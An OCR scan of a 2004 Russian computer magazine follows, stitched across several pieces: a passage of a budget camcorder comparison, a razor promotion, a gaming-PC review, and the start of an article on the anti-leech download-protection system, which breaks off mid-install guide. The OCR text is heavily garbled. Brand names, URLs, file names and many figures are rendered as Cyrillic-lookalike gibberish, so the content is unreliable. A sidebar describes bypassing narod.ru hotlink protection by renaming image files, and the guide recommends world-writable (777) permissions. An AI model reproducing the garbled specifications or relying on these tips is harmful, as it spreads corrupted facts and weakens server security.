ной кассетой. Будь внимателен! Ни- 
когда не пользуйся чистящей кассе- 
той повторно и соблюдай все 
инструкции, которые прописаны изго- 
товителем в документации. 

А ОБЩИЕ ХПРПКТЕРИСТИКИ 

Для теста мы взяли 7 видеокамер 
нижнего ценового диапазона (до 
500 у.е.), представленных на рынке. 
Что можно получить на эту сумму? 
Все рассмотренные камеры имеют 
одну матрицу в 800 000 пикселов, 
из которых при съемке использует- 
ся до 400 000 (максимальное значе- 
ние), и физический размер матри- 
цы в 1/6 дюйма (в камерах, кото- 
рые используются для съемок теле- 
визионных передач вне студии, на- 
ходятся 3 матрицы по 1 000 000 
пикселов каждая). Этого вполне 
достаточно для того, чтобы полу- 
чить видеоматериал любительского 
качества с разрешением до 720x576 
(такое же разрешение у фильмов, 
записанных на О \Ю). Помимо этого, 
камеры обладают возможностью 
делать фотоснимки с разрешением 
до 1 024x768 пикселов и сохранять 
их на кассету с голосовым коммен- 
тарием (возможность сохранять 
снимки и видеофрагменты на 
флеш -карты памяти есть у более 
дорогих моделей). В конечном ито- 
ге, различия моделей сводятся к 
качеству изготовления матрицы, 
оптике и цифровому процессору. 

^ ИЕТОПИКП ТЕСТИР0В0НИЯ 

Тестирование всех камер было раз- 
делено на несколько этапов: 



Основные элементы 
управления удивили 
удачным расположением. 



О. съемка в помещении при 
дневном освещении; 

О. съемка в помещении при ис- 
кусственном освещении; 

®. съемка на улице днем; 

О. съемка на улице вечером. 

Также большое внимание уделя- 
лось эргономике и внешнему виду 
девайса. 

Съемки любительской камерой 
чаще всего производятся без штати- 
ва и в движении, был проведен и та- 
кой тест. У всех камер присутствова- 
ла функция стабилизации изображе- 
ния. Ради объективности теста она 
была активирована на все время тес- 
тирования. На всех девайсах был 
отключен цифровой зум, чтобы каче- 
ство отснятого материала зависело в 
большей части от оптики. Также все 
настройки дисплея и баланса белого 
оставили в дефолтном значении. 

ОСМОТРИМ КОМЕРЫ 

8ПМ81М6ѴР-0 10201 

Первой на испытание попала каме- 
ра фирмы Затзипд. Комплектация 
порадовала своей полнотой: руко- 
водство пользователя на русском 
языке, кабель З-ѵібео, кабель 115В, 
переходник іаск-А/Ѵ с проводом 2 
м, блок зарядки с проводом ~2 м, 



зонтальной плоскости, что позволя- 
ет снимать на вытянутой вверх ру- 
ке. Также можно повернуть дисплей 
(картинка перевернется автомати- 
чески) и снимать самого себя. Под 
дисплеем находится динамик, с его 
помощью довольно приятно смот- 
реть отснятый материал. 



Фильтр имеет диаметр в 30 мм, 
что позволяет большому количеству 
света попасть на матрицу. Фокусное 
расстояние изменяется от 2,3 до 46 
мм, обеспечивая приличное качест- 
во съемки. Максимальная диафраг- 
ма Т/2,7 дает нам неплохую глубину 
резкости. 

РШ80МСМНІ8116СИ 
РПІИП80ДІІС N11-6833 

Далее по плану камеры от Рапазопіс. 
В комплектацию входит зарядное 
устройство, кабель 118В, диск с драй- 
верами, чистящая кассета, пульт 
дистанционного управления и нап- 
лечный ремень. Зарядное устройство 
позволяет заряжать аккумулятор от- 
дельно от камеры, что очень удобно, 
если покупаешь дополнительный 
элемент питания. Стандартно с кам- 
кодером поставляется аккумулятор 
ССК-О08К, 7,2 V, 800 тАИ (Ш-іоп), 
рассчитанный на 100 минут записи 
без использования ЖК-экрана. 

Обе камеры прочно ложатся в руку 
и не скользят благодаря шерохова- 
тости корпуса. Основные элементы 
управления удивили удачным распо- 
ложением. Переключение режимов 
съемки и просмотра отснятого видео 
вынесено на отдельное колесо. В 
угоду оператору присутствует функ- 
ция Оиіск Зіагі, которая позволяет 
начать съемку практически мгновен- 
но, но кнопка расположена неудачно, 
и нажать ее можно только имея 
очень длинные и гибкие пальцы. Сте- 
реомикрофон расположен на перед- 
ней панели камеры, благодаря чему 
задействуется технология аудиозума. 

Для удобства пользователя монох- 
ромный видоискатель выезжает из 
камеры на пару сантиметров. Дан- 
ные камкодеры позволяют выбирать 
между автоматической или ручной 
фокусировкой. Широко открываю- 
щийся ЖК-монитор размером в 2,5" 
довольно информативен, но, к сожа- 
лению, предоставляет информацию 




РПИП80ЖСМІ-С833СС 






Разрешение фотографий: 640x480 



Вес: 365 гр 



Разъемы: ОѴ-вход/выход (ІЕЕЕ 1394), АѴ, $- 
ѵісіео-выход, микросрон, ІІЗВ 



Размер: 63x78x99мм 



Разрешение матрицы: 0,8 Мпикс 



Объектив: Юх 
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товар сертифицирован 



ОШеНе 

ВІаІотРОш'^рар т 

в твою пользу! 

Участвуй в Акции! 



Купи СіІІеНе® ЗІаІот РІііз™ Зрогі 

Вырежи логотип с упаковки СіІІеПе® ЗІаІот РІыз™ Зрогі 
Ответь на вопрос "Почему я сыграл в пользу СіІІеИе® ЗІаІот РІцз™ Зрогі?" 

Пришли логотип и ответ по адресу: 1 1 757 4, Москва, а/я "ЗІаІот РІііз™ Зрогі". 

Выиграй: 

• Один из 3-х домашних кинотеатров с комплектом спутникового телевидения* 

• 1 000 первых приславших ответ получат спортивное РМ-радио 

• Бее участники получат стильную наручную сумку 



* Победители определяются специальным жюри. 



Рекомендуемая 
розничная цена 6 руб. 




*Организатор оставляет за собой право заменить 
главный подарок на аналогичный в случае прекращения 
выпуска указанного подарка и в других случаях. 





Домашний кинотеатр и комплект 
РМ Радио* спортивного спутникового телевидения* 



ОШеНе 



лучше для мужчины нет 



Подробную информацию об акции и правилах участия Вы можете получить по телефону 
"горячей линии" 8-800-200-888-2 и на сайте ѴѴѴУѴУ.5ІаІОтрІІІ55рОГІ.СІІуОІІІ.ГІІ 





ЖЕЛЕЗО 



ХПКЕР/№09(69)/2004 
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Объектив: 20х 



Вес: 460 гр 



Размер: 55x87x150 мм 



Разъемы: 05В, ОѴ-вход/выход (ІЕЕЕ 1394), АѴ, $- 
ѵібео-выход 



только на английском языке (все ос- 
тальные модели камер позволяли ус- 
тановить русское меню). Рапазопіс 
NN/-051 1 0С и ІЧѴ-С833 понравились 
всем, кто принимал участие в тести- 
ровании, за свои скромные габариты 
и эргономичность. 

Диаметр объектива обеих камер 
равен 27 мм. Фокусное расстояние 
варьируется от 2,1 до 50,4 мм (2,3- 
23 мм у Рапазопіс NN/-0333), что яв- 
ляется очень хорошим показателем 
при таких габаритах. Диафрагма VI .8 
дает больше возможностей, нежели 
диафрагма у Затзипд ѴР-Э1 02ЭІ. 

Сапоп N11830 и Сапоп МІІ700І 

К нам поступили две камеры от име- 
нитого производителя. Так как моде- 
ли очень схожи и даже имеют очень 
близкие индексы, можно сделать вы- 
вод, что основа у них одна. Так и ока- 
залось при тестировании. Комплекта- 
ция данных девайсов также порадо- 
вала: зарядное устройство, кабель- 
переходник на А /V, переходник на 
разъем ЗСАРТ, наплечный ремень и 
руководство пользователя на 5 язы- 
ках, включая русский. С моделью 
Сапоп МѴ690 поступил аккумулятор 
ВР-508, 7,4 V, 800 тАб (Ш-іоп), а с 
Сапоп МѴ700І был аккумулятор повы- 
шенной емкости ВР-51 1 , 7,4 V, 11 00 
тАГі (Ш-іоп) (их хватает без ЖК-дисп- 
лея примерно на 1 :20 и 1 :40). 

Камеры обладают необычным 
дизайном, что отнюдь не мешает 
хорошей компоновке. Все органы 
управления расположены удачно и 
легкодоступны. Цветной видоиска- 
тель поднимается для удобства сь- 
емки и доступа к аккумулятору. На 
передней панели, помимо объекти- 
ва, расположен ЭѴ- выход, закры- 
тый пластиковой вставкой, и стере- 
омикрофон. Практически ко всем 
кнопкам управления съемкой и 
воспроизведением можно получить 
доступ, не открывая ЖК- видоиска- 
тель. Сам мониторчик зафиксиро- 



ван предохранителем, и случайно 
открыть его не получится. Работать 
с меню очень удобно благодаря ру- 
сификации и колесу іод -б іаі. Под 
ЖК-дисплеем расположены клави- 
ши активации цифровых эффектов, 
настройки баіа собе (адрес кадра в 
секундах, по нему ориентируются 



8(Ш 0СВ-НС1 8Е и 80ІІІѴ 0СВ-НС20Е 

Имеем две камеры от самого име- 
нитого производителя видеотехники. 
Полнейшая комплектация: инструк- 
ция пользователя на нескольких 
языках, включая русский универ- 
сальный кабель с композитными 
А/Ѵ-выходами, 3-ѵібео, зсагі-пере- 
ходник, ІІЗВ-кабель. Миниатюриза- 
ция во всем своем величии! 10 кно- 
пок и выключателей на корпусе! До- 
полнительные органы управления не 
требуются: все можно настроить при 
помощи сенсорного экрана. Камера 
легко переходит на русский при вы- 
боре необходимого пункта в меню. 
Возможность снимать в полной тем- 
ноте присутствует благодаря мощ- 
ной инфракрасной подсветке. Фир- 
ма заявляет, что возможна цветная 
съемка при очень слабом освеще- 
нии. Стереомикрофон расположен 
на передней панели и пишет звук 
чисто, без шума работающей меха- 
ники. На верхней панели присут- 
ствует универсальное гнездо для ус- 
тановки лампы подсветки или мик- 
рофона. Линза объектива защищена 
сдвигающейся шторкой. Для упро- 
щения съемки есть режим автомати- 
ческой настройки параметров, кото- 



1 Возможность снимать в полной 1 
темноте присутствует благодаря 
I мощной инфракрасной подсветке. | 



рый активируется кнопкой БАЗУ на 
боковой панели. Видоискатели обе- 
их камер монохромные и произво- 
дить съемку комфортнее с ЖК-мо- 
нитором, подсветку которого можно 
отключить. На нем расположена до- 
полнительная кнопка записи для 
простоты съемки самого себя. В 
фильтрах используется оптика СагІ 
2еІ55 Ѵагіо-Теззаг, признанная самой 
удачной из всех создававшихся для 
фото- и видеоаппаратуры. Как эта 
малютка будет соперничать с ос- 
тальными - покажет тест. 

Оптика: Диаметр фильтра - 25 
мм. Самая компактная камера и са- 
мый маленький объектив, который 
дает поток света слабее, чем у аппа- 
ратов Сапоп. Фокусное расстояние 
при видеосъемке составляет 2,3-23 
мм. В таком миниатюрном корпусе 
просто негде разместить больше. 
Максимальная диафрагма Т/2,3 так- 
же вносит свой вклад при создании 
качественной картинки. 

Л тестирован» 

ЗПИЗІІИСІР-З 10201 

Эта камера в помещении без искус- 
ственного света показала, по наше- 
му мнению, довольно бледную кар- 
тинку. Съемка против светлого окна 
выявила недостаток чувствитель- 
ности матрицы. Включение допол- 
нительного освещения добавило 
красок, но цвет кожи приобрел ро- 
зоватый оттенок. Было замечено 
преобладание красного. Съемка на 
улице днем показала бледноватую 
картинку, исправить положение по- 
могли настройки баланса белого, 



при монтаже; можешь задать этот 
код, и кассета отмотается на дан- 
ный кадр. На аналоговом аппарате 
такой точности не добиться) и по- 
иска окончания съемки. В модели 
Сапоп МѴ700І добавлена клавиша 
ВЕС РАІІ5Е. Меню обоих камкоде- 
ров одинаково. Над объективом 
расположено крепление для лампы 
подсветки, позволяющее подобрать 
оптимальный вариант в соотноше- 
нии потребление/яркость, но отсут- 
ствие хоть какого-нибудь встроен- 
ного освещения удручает. Сапоп, 
известная хорошими объективами, 
применила в данных камерах тех- 
нологию литья прецизионных стек- 
лянных линз, что позволило изгото- 
вить асферические элементы для 
объектива. Это дало хорошую рез- 
кость по всему кадру. Изображение 
обрабатывает видеопроцессор 
ЭІСІІС ЭѴ, который позволяет более 
красочно и реалистично передавать 
оттенки кожи. 

Оптика: Диаметр фильтра - 30,5 
мм. Фокусное расстояние при виде- 
осъемке составляет 2,8-50,4 мм, а 
максимальная диафрагма - 1/1 .6. 
Именно благодаря этому удачному 
сочетанию мы получили лучшую 
картинку. 



Съемка против светлого окна 
выявила недостаток 
чувствительности матрицы. 





N117001 



Разрешение фотографии: 1024x768 



Объектив: 18х орТісаІ 



Вес: 490 гр 



Размер: 53x95x139 мм 



Разъемы: наушники, ОѴ-вход/выход (ІЕЕЕ 1394), АѴ 
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СПШМІІ690 



Разрешение фотографий: 1024x768 



Разрешение матрицы: 0,8 Мпикс 



Объектив: 18х оріісаі 



Вес: 490 гр 



Размер: 53x95x139 мм 



Разъемы: наушники, РѴ-вход (ІЕЕЕ 1394), АѴ 



1 Баланс белого имеет 4 пункта: 1 

авто, в помещении, вне 
I помещения, рунная настройка. | 



но мы уже отошли от заводских ус- 
тановок. Камера обладает 20-крат- 
ным оптическим и 900-кратным 
цифровым зумом. 

Заявленная функция съемки в 
полной темноте реализуется до- 
вольно хорошо. Благодаря инфрак- 
расным источникам света можно 
снимать на расстоянии до 3 мет- 
ров, не задумываясь об освеще- 
нии. Картинка получается довольно 
четкой (до 1,5 метров), но фокуси- 
ровка теряется при попадании в 
кадр металлических предметов, от- 
ражающих И К- луч и. Эту функцию 
можно использовать в большей 
степени как развлечение. Картинка 
получается зеленоватой, и мелкие 
детали просто ускользают от вни- 
мания оператора. 

Баланс белого имеет 4 пункта: ав- 
то, в помещении, вне помещения, 
ручная настройка. При съемке мож- 
но использовать 8 спецэффектов: 
художник, мозаика, сепия, негатив, 
зеркало, черно-белая, рельеф, кино. 
Картинку можно тонировать в один 
из цветов: красный, синий, зеленый 
и желтый. Автоэкспозиция имеет 
следующие установки: авто, порт- 
рет, прожектор, песок/снег и корот- 
кая выдержка. 

Звук несколько подкачал, хотя и 
использовалась одна стереодорожка 
16 Ьіі. В большей степени это обус- 
ловлено неудачным расположением 
микрофона. В частности, при съемке 
с 3 метров разговора слышно не бы- 
ло, но зато отлично были слышны 
сигналы проезжающих в отдалении 
машин. Шум лентопротяжного меха- 



низма можно слышать, лишь сделав 
запись в полной тишине. 

Затзипд ѴР-О102ЭІ имеет прак- 
тически все возможные коммуника- 
ционные выходы. Это ІІЗВ, РігеѴѴіге, 
А/Ѵ, 3-ѵібео и выход микрофона. 
Программа работы с видео 
(Затзипд ОМС Месііа 5.1 ) отказалась 
найти камеру, подключенную по 
ІЕЕЕ 1394. 

Камера получает оценку 5 за на- 
личие необычной функции съемки в 
полной темноте, а за получаемый 
звук снимаем балл, итого - 4. 

РОНОЗОІІІС N11-6811601 
РПІШОДІІС N11-6833 

При съемке с недостаточным осве- 
щением камеры показали не самую 
качественную картинку. С дополни- 
тельным светом цвета стали естест- 
веннее и мягче. Помимо этого, есть 
функция зоЙ зкіп, которая еще 
больше смягчает цвета. Оттенки ко- 
жи выглядят очень натурально. ЖК- 
видоискатель выдает довольно 
блеклую картинку, что можно исп- 
равить в настройках дисплея. До- 
полнительный режим Соіоиг Мдій 
Ѵіеѵѵ многократно повышает 
чувствительность матрицы, но зат- 
рудняет фокусировку. Рапазопіс ІМѴ- 
031 ЮС обладает встроенной подс- 
веткой, состоящей из 4 светодио- 
дов. Такое решение имеет свои 
особенности: очень низкое энерго- 
потребление, имеется искажение 
цветов при съемке. Так как исполь- 
зуются не лампы накаливания, 
изображение получается с синева- 
тым оттенком. Широко открываю- 
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щийся ЖК-видоискатель удобен в 
использовании. 24-кратный (Юху 
Рапазопіс NN/-0533) оптический 
зум, позволяющий снимать на дос- 
таточном удалении, и 800х (500х у 
Рапазопіс NN/-0533) цифровой реа- 
лизованы достаточно качественно. 
Правда, пользоваться им без шта- 
тива будет очень затруднительно. 
Оба камкодера могут быть исполь- 
зованы как ѵѵеЬ- камеры. 

Расположенный на передней па- 
нели стереомикрофон обладает 
функцией звукового приближения. 
Звук довольно чистый и без помех. 
Шум лентопротяжного механизма 
отсутствует. 

При съемке можно использовать 
12 цифровых эффектов. Помимо 
этого, есть преднастройки баланса 
белого: авто, съемка в помещении, 
съемка вне помещения, установка 
при помощи ИК-сенсора. Включены 
и режимы автоэкспозиции: спорт, 
портрет, низкая освещенность, про- 
жектор, пляж и снег. 

Разъемы: ОѴ-выход (ІЕЕЕ 1394), 
аналоговый выход, 5-ѵібео- выход, 
вход для микрофона, ІІЗВ 2.0. 

В целом, это лучшая камера об- 
зора, огорчает только синий отте- 



нок, который придает объектам 
встроенная подсветка. 

Баллы: Рапазопіс NN/-051 ЮС - 
4, Рапазопіс МѴ-СЗЗЗ - 3,5. 

СПШМиб90ИСПШМІІ700І 

Так как к нам поступили практически 
ничем не различимые камеры, то и 
тестировали мы их одновременно. 
Благодаря асферическим элемен- 
там, используемым в фильтре, объ- 
екты получаются четкими по всему 
кадру. При недостаточной освещен- 
ности очень заметны шумы изобра- 
жения. Так как встроенной подсвет- 
ки нет, возможность снимать в тем- 
ноте отсутствует. При дневном или 
искусственном освещении качество 
картинки очень хорошее. Встроен- 
ная функция МдМ Мосіе может под- 
нять качество изображения при не- 
достаточном освещении за счет по- 
вышения чувствительности матрицы, 
но видео получается расплывчатым. 
Оттенки кожи передаются отлично. 
При солнечной погоде съемки этими 
камерами показали наилучшие ре- 
зультаты. Помимо всего этого, ка- 
меры обладают цветным видоиска- 
телем, что нехарактерно для их це- 
новой ниши. Сапоп МѴ690 и Сапоп 



При сьемке можно 
использовать 12 
цифровых эффектов. 





МѴ700І имеют 1 8-кратный оптичес- 
кий зум и 360х - цифровой. 

Управлять камерой вслепую до- 
вольно удобно благодаря различным 
темам звукового сопровождения (на 
выбор 3 звуковые темы). Стерео- 
микрофон расположен на передней 
панели и записываемый звук до- 
вольно чист, но все же проигрывает 
Рапазопіс NN/-051 1 0С. 

Камеры обладают большими воз- 
можностями по редактированию и 
съемке видео, это 9 эффектов: жи- 
вопись, сепия, однотонный, мозаи- 
ка, светофильтр, зеркало, шар, куб, 
волна - и 9 монтажных переходов: 
автоматический, вытеснение, саль- 
то, угловой, прилив и отлив, пазл, 
луч, зигзаг, скачок. 8 режимов авто- 
экспозиции: полностью автомати- 
ческий, автоматический, спорт, 
портрет, прожектор, песок и снег, 
низкая освещенность, ночная съем- 
ка. Выдержку затвора также можно 
регулировать от 1 /6 до 1 /2000 с. 

Разъемы: ЭѴ-выход (ІЕЕЕ 1394), 
аналоговый А/Ѵ- выход. 

Оценка: 4 балла. 

ЗОЕІѴ ОСВ-НС 1 8Е И 8817 0СВ-НС20Е 

Эти камкодеры от одного произво- 
дителя внешне одинаковы. Различия 
коснулись лишь того, что в модели 
ЗОІМѴ 0СР-НС1 8Е отсутствует воз- 
можность записи на кассету через 
РігеѴѴіге. Самые легкие и технологи- 
чески насыщенные устройства в об- 
зоре. Функция цветной съемки в 
слабоосвещенном помещении реа- 
лизована довольно хорошо. Встро- 



енный инфракрасный источник поз- 
воляет снимать в полной темноте. В 
сравнении с камерой Затзипд ѴР- 
01 (Ш ночная съемка получается 
ярче, но освещаемая площадь уже. 

В список функций входят: точечная 
фокусировка, автоматический/руч- 
ной фокус, автоматическая/ручная 
экспозиция. Причем фокусировку и 
экспозицию можно настраивать на 
любой точке снимка, одним касани- 
ем экрана в нужном месте. Встроен- 
ная шторка является большим преи- 
муществом, нежели съемная крыш- 
ка. Записанный звук оказался хоро- 
шего качества, но при просмотре 
громкость приходится немного 
уменьшать. 

При съемке можно воспользо- 
ваться 6 режимами: стоп-кадр, 
стробоскоп, наложение стоп-кадра, 
медленный затвор, траекторный 
след, классическое кино. Также 
можно применить 7 фейдеров. Авто- 
экспозиция на 5 режимов: спорт, 
портрет, слабое освещение, прожек- 
тор, пляж/лыжи, закат/луна. 4 пред- 
настройки баланса белого: АіЛо, 
ОиМоог, Іпсіоог, НоІсІ. 

Разъемы: ІІЗВ, РігеѴѴіге, А/Ѵ 
ОІЯ, тіс, ЦШС (для выносного 
пульта с микрофоном). 

Оценка: 5 баллов. 




Несомненным победителем теста стала камера ЗОЫѴ РСП-НС20Е. Со- 
четая в себе малые размеры при максимальных возможностях, она 
взяла «Выбор редакции». Камеры от Рапазопіс можно посоветовать для 
любителей компактной и качественной техники. Затзипд ѴР-0102РІ - 
камера для шпионов и желающих получить универсальный девайс с хо- 



рошей картинкой. Но Сапоп МѴ700І показала наилучшее изображение 
из всех протестированных и награждается званием «Лучшая покупка». 
Отсутствие встроенной подсветки несколько расстроило, но наличие 
универсальной площадки для крепления видеолампы или микрофона 
позволяет рассчитывать на удачные кадры с вечеринок. 
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ПЕЗО 






ПОЯВИЛСЯ ОЧЕРЕДНОЙ ИГРОВОЙ МОНСТР 






С тильный черный агрегат 
и такие же по цвету кла- 
виатура с мышкой 
М іеговой сразу создают 
приятное впечатление. 
Перед нами новый 
мощный домашний иг- 
ровой компьютер ЭЕРО 
Едо. Очень приятный, мягкий ди- 
зайн корпуса, в котором ничто не 
вызывает раздражения или неприяз- 
ни. Визуально даже не за что заце- 
питься. Понравилась даже наклейка- 
реклама на самой видной части: 
«Работает как часы». Системный 
блок при осмотре оказался довольно 
качественной сборки. 

Из 5” устройств есть только одно - 
это пишущий О МО-Н/Ш, также черно- 
го графитового цвета. Он способен не 
только читать М)-диски и резать 
обычные СО-болванки, но и записы- 
вать и перезаписывать ШЭ-носители. 

Карт-ридер придется тебе по ду- 
ше, если ты весьма техногенный ма- 
лый и пользуешься самыми модны- 
ми девайсами и гаджетами, для ко- 
торых требуются карты памяти, нап- 
ример, смартфон, МРЗ-плеер или 
цифровой фотоаппарат. 

Клавиатура очень удобная - с эр- 
гономической подставкой, которая 
не даст перенапрячься кистям рук за 
время работы и протирания наск- 
возь компьютерного кресла. 

Оптическая мышка позволит за- 
быть про чистку валиков и вид пове- 
рхности, на котором она будет ис- 
пользоваться (кроме стекла, разуме- 
ется - при. ред.). Хотя на наш 
взгляд, мышь могла бы быть и пок- 
руче, например 1_одйесП серии МХ, 
которая очень хорошо ложится в 
большую ладонь. 

На систему изначально уже была 
установлена М іеговой ѴѴіпсІоѵѵз ХР и 
все необходимые для нее драйверы 
от различных устройств, которые пос- 
тавляются вместе на одном диске. 

В основе ЭЕРО Едо лежит очень 
хорошо зарекомендовавшая себя 
материнская плата - Азиз Р4С800, 
она имеет высокую производитель- 
ность и большие возможности по 



разгону процессора. В связке с 
процессором Іпіеі Репііит 4 3,2 
ГГц с технологией Нурег-ТГігеасІіпд 
и 512 Мб оперативной памяти эта 
системная плата будет себя прек- 
расно чувствовать и работать. 
Кстати говоря, память здесь уста- 
новлена в виде двух модулей по 
256 Мб. Двухканальный режим ра- 
боты ОЗУ, несомненно, является 
плюсом в сравнении с некоторыми 
конкурентами. 

Огромный жесткий диск на 200 Гб 
поможет тебе забыть о нехватке 
свободного места, даже если ты 
хранишь все просмотренные филь- 
мы на компьютере. 

Завершает же весь этот мощный 
ряд видеокарта на базе АТІ Васіеоп 
9800ХГ. Достаточно производитель- 
ный видеоускоритель позволит иг- 
рать в любые самые новые игры (Гаг 
Сгу, Ооот 3, НаІТ МТе 2) без каких- 
либо тормозов, и еще останется не- 
большой задел на будущее. 

Вообще, говорить об определен- 
ной комплектации не совсем корре- 
ктно, потому что фирма-сборщик 
предлагает ее изменение в самых 
широких диапазонах. В данной же 
системе не понравилось только одно 
- это интегрированная в материнс- 
кую плату звуковая карта, можно бы- 
ло бы и нормальную от Сгеайѵе пос- 
тавить. 

Для проверки производительнос- 
ти компьютера использовался стан- 
дартный набор бенчмарков - 
Ациатагк, ЗйМагк 2003, запуск ко- 
торых производился на настройках 
по умолчанию. 

Кроме того, были опробованы иг- 
ры Раг Сгу и ІІпгеаІ Тоигпатепі 2004, 
они запускались при максимальной 
детализации и двух разрешениях 
1024*768 и 1600*1200. Результаты 
оказались очень высокими по ны- 
нешним временам, можно не сомне- 
ваться, что этот черный стильный 
монстр справится с ролью игрового 
компьютера. Который, как известно, 
всегда должен быть самым произво- 
дительным и иметь в арсенале са- 
мое новое железо. ЗС 
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И ривет, дружище! Как поживает твой сайт? Количество хостов уже перевалило за 1 000? Читаешь благодарные отзывы посетителей 
за эксклюзивный стаф? Костер удивляет гигантскиии счетами за трафик? Нет? Как, у тебя вообще нет сайта? О это и не важно! Я 
расскажу тебе о замечательной штуке, про которую пока еще мало кто знает, но очень скоро почти все с ней столкнутся. Слушай. 




защита вебконтенто 




ОТ КОГО ЗОЩИЩЯЕНСЯ 

К аждый день мы с тобой гуля- 
ем по инету в поисках свежего 
софта, музыки, фильмов 
(правда, качаешь фильмы, 
буржуй?) и остальных полез- 
ных вещей. И ведь эти гига- 
байты где-то должны хранить- 
ся. Кто-то (понятно кто - вла- 
делец сайта чаще всего) вынужден оплачи- 
вать хостинг. На помощь в таких случаях 
приходит реклама, которая, как известно, 
является двигателем рыночных отношений. 
Захотел юзер скачать веселых картинок с 
твоего сервера - пусть почитает рекламу 
спонсора. Захотел варез... т.е. бесплатным 
софтом полакомиться - пусть полюбуется 
красивыми попами. И все бы было хорошо, 
но хитрож... умные юзеры придумали всякие 
ухищрения вроде баннерорезок, попорубок, 
рекламозакры валок и прочих фильтров. 

Да и сам ты, наверное, понаставил плагинов 
и файрволов, которые баннеры по размеру 
отсекают, да всплывающие окна блокируют, 
ага? Вот и остальные тоже. Картинку или 
файлик с твоего сервера сольют, а на банне- 
ры болт положат. А вот твои же коллеги-сай- 
тостроители дадут прямой линк на твое доб- 
ро со своего сайта, словно на свою 
собственность, или картинку с твоего серве- 
ра в свой НТМЬкод вставят. Им будет почет 
и уважение, а тебе достанутся сплошные 
расходы и никакой благодарности. 

Сайтовладельцы боролись с этим по мере 
своих возможностей. Не особо успешно, 



надо сказать. Все изменилось с появлением 
технологии апй-іеесіі от компании ѴѴаке№1 
АВ. Слово «Іеесіі», кроме своего прямого 
значения («пиявка»), переводится как «кро- 
вопийца». В нашем случае кровопийцами яв- 
ляются те, кто использует твои ресурсы в 
своих целях. Воры, проще говоря. Сайт 
шѵшіі-іеесіі.сот предлагает различные услуги 
в области защиты данных на веб-серверах: 
защита МтІ-кода и скриптов, мыла от спам- 
ботов и не только. Я остановлю свой взгляд 
на самом интересном. 

А ВОРЫ ИДУТ ЛЕСОМ 

Система защиты состоит из двух частей, ра- 
ботающих в паре. Первая - серверная часть 

- комплекс скриптов на твоем сайте. Вторая 

- клиентская - плагин к браузеру на стороне 
пользователя. 

Серверная сторона решает две задачи. 
Во-первых, осуществляет управление твои- 
ми даунлоадами, то есть всем тем, что ты 
предлагаешь скачать со своего сайта. Анти- 
лич предлагает пакадж (раскаде) - логически 
связанный набор файлов. Например, нес- 
колько песен, составляющих музыкальный 
альбом, или программу вместе с набором 
дополнительных модулей к ней. 

Действия, которые можно осуществлять с 
пакаджами: 

а создание, изменение и удаление; 

л импортирование; 

а шифрование; 

а управление скачиванием файлов, входя- 
щих в состав пакаджа, а также проверка мес- 



та, откуда была инициирована закачка файлов 
(поле «НТТР-НеТегег» в запросе браузера). 

Вторая задача - сбор и анализ статистики 
скачивания. 

А КОК ОНО РПБОТПЕТ 

Клиент не видит реального расположения 
файлов, скачиваемых с твоего сайта. Он об- 
ращается по адресу Шр://<сервер>/<путь-до-риЬІіс- 
каталога>/с!оѵѵпІоас1.рІ?раскаде =<название-пака>. Сна- 
чала скрипт боѵѵпіоасі.рі проверяет значение 
поля «НТТР-НеТегег» в запросе браузера, и, 
если оно не входит в список допустимых для 
твоего пака, процесс прерывается с сообще- 
нием «Ассезз ОепіесІ». Затем боѵѵпіоасі.рі по- 
сылает браузеру код страницы, в который 
включена ссылка на плагин [Шр://рІидіп.апіі- 
Іеесіі.сот/аіріидііф. Этот код страницы называ- 
ется шаблоном Детріаіе), ты можешь изме- 
нять его на свое усмотрение, нагружая бан- 
нерами или подгоняя под дизайн своего сай- 
та. Но можешь оставить и дефолтную вер- 
сию шаблона. Браузер скачивает пак с сер- 
вера (паки лежат в Шр://<сервер>/<путь-до-риЬІіс- 
каталога>/раскаде$) и выполняет плагин, кото- 
рый берет пак, расшифровывает его содер- 
жимое, проверяет его валидность и целост- 
ность, после чего показывает клиенту список 
файлов для скачивания. После этого клиент 
может начать загрузку. 

Кстати, плагин глючит с русским языком, 
поэтому я в примере все сделал на английс- 
ком, чтобы впечатление не портить. 
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А СТОВИИ ПРОТИВОУГОННУЮ 
СИСТЕМУ 

Есть два варианта дистрибутива: под 
ѴѴіпсІоѵѵз и для ІІІЧІХ-машин. Чтобы сэконо- 
мить время, я опишу процесс установки под 
ѴѴіпсІоѵѵз-систему ввиду ее чуть большей 
простоты. Для корректной работы системы 
необходимо, чтобы на сервере был установ- 
лен РегІ (для ѴѴіпсІоѵѵз - АЫіѵе РегІ 5.6.x и вы- 



ше, для ІІІМІХ - РегІ 5.5.x и старше). Начнем 
с того, что создадим на сервере три дирек- 
тории: аііпзіаіі, риЫіс и ргіѵаіе (под ІІІМІХ сра- 
зу поставь этим дирам права 777). Первые 
две должны находиться в пределах 
ОоситепШооІ твоего сервера, а директория 
ргіѵаіе - вне ОоситепШооТ Ко всем трем 
веб-сервер должен иметь доступ. Скачаем 
архив аІіпзІаІЫр (аііпзіаіі.іаг.ді для ІІІМІХ- 
версии) и зальем его содержимое в дирек- 
торию аііпзіаіі (она нам понадобится только в 
процессе установки). Теперь надо позабо- 
титься о том, чтобы веб-сервер имел воз- 
можность запускать РегІ -скрипты не только 
из ССН-ВІИ, но и из аііпзіаіі и риЫіс. Если это 
не разрешено по умолчанию (скорее всего, 
так и будет), создадим в них файл .Ыассезз, 
содержащий строку «Орііопз -гЕхесССІ». 

Предварительная подготовка окончена. 
Открывай браузер и пиши: 
ШрУ/тусооІ5ііе.ги/аІіп$іаІІ/іп5ІаІІ.рІ. Должен запус- 
титься скрипт конфигурирования системы. 



ОБМПНИНПРОД 

Н агой, ш решил не отставать от других и тоже сделал защиту 
от вставки картинок со своих серверов в чужой НТМІ_-код, 
чтобы их сервер нельзя было использовать как бесплатное хра- 
нилище картинок. Если ты попробуешь на своем сайте вставить 
что-то вроде <ітд згс=ІіДр://тиаІіаІіа.пагосІ.ги/ріс1:иге.ірд>, то 
картинки видно не будет. Способ обхода такого ограничения 
крайне прост. Надо лишь переименовать на народовском сер- 
вере рісіиге.ірд в рісІиге.ТіІтІ и исправить ссылку на страничке. 
Картинка откроется без проблем. 



Если вдруг этого не произошло или выскочи- 
ла ошибка, проверь в настройках сервера, 
есть ли у него возможность исполнять 
скрипты НЕ из СОН-ВІИ, а также (если ты под 
никсами) проверь права исполняемых фай- 
лов. Но, допустим, все прошло удачно. 
Смотрим, что у нас есть: 
л Вузіет Іуре (ѴѴіпсІоѵѵз, ІІИІХ) - понятно, 
что это система, под которой работает сер- 
вер. Она должна определиться правильно. 

л РиЫіс сІігеЫогу - каталог риЫіс, в кото- 
